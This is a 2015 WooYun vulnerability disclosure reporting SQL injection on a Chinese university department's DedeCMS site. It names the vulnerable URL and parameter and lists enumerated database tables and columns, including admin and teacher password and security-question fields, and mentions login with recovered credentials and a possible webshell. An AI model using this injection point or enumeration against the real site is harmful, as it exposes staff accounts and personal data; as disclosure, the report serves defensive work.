当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111163

漏洞标题:某高校站点存在sql注入,泄露教师资料

相关厂商:中国地质大学

漏洞作者: 孤风

提交时间:2015-05-26 14:37

修复时间:2015-05-31 14:38

公开时间:2015-05-31 14:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-26: 细节已通知厂商并且等待厂商处理中
2015-05-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入

详细说明:

教师介绍页面出现sql注入

漏洞证明:

注入点

http://au.cug.edu.cn/jsxx/jsxx.php?mid=27


跑跑表

Database: autoxyweb
[90 tables]
+------------------------------+
| dede_addonarticle |
| dede_addonimages |
| dede_addoninfos |
| dede_addonshop |
| dede_addonsoft |
| dede_addonspec |
| dede_admin |
| dede_admintype |
| dede_advancedsearch |
| dede_arcatt |
| dede_arccache |
| dede_archives |
| dede_arcmulti |
| dede_arcrank |
| dede_arctiny |
| dede_arctype |
| dede_area |
| dede_channeltype |


字段

Database: autoxyweb
Table: dede_admin
[10 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| email | char(30) |
| id | int(10) unsigned |
| loginip | varchar(20) |
| logintime | int(10) unsigned |
| pwd | char(32) |
| tname | char(30) |
| typeid | text |
| uname | char(20) |
| userid | char(30) |
| usertype | float unsigned |
+-----------+------------------+


教师信息表

Column       | Type                  |
--------------+-----------------------+
checkmail | smallint(6) |
cs | mediumtext |
email | char(50) |
exptime | smallint(6) |
face | char(50) |
joinip | char(16) |
jointime | int(10) unsigned |
loginip | char(16) |
logintime | int(10) unsigned |
matt | smallint(5) unsigned |
mid | mediumint(8) unsigned |
money | mediumint(8) unsigned |
mtype | varchar(20) |
pwd | char(32) |
rank | smallint(5) unsigned |
safeanswer | char(30) |
safequestion | smallint(5) unsigned |
scores | mediumint(8) unsigned |
sex | enum('男','女','保密') |
spacesta | smallint(6) |
uname | char(36) |
uptime | int(11) |


其中一些还可以用密码去登陆教师管理系统,图片就不放了
后台发现是dedecms

QQ图片20150429212337.png


获取webshell之后事就不做了

修复方案:

你们懂的

版权声明:转载请注明来源 孤风@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-31 14:38

厂商回复:

最新状态:

暂无


漏洞评价:

评论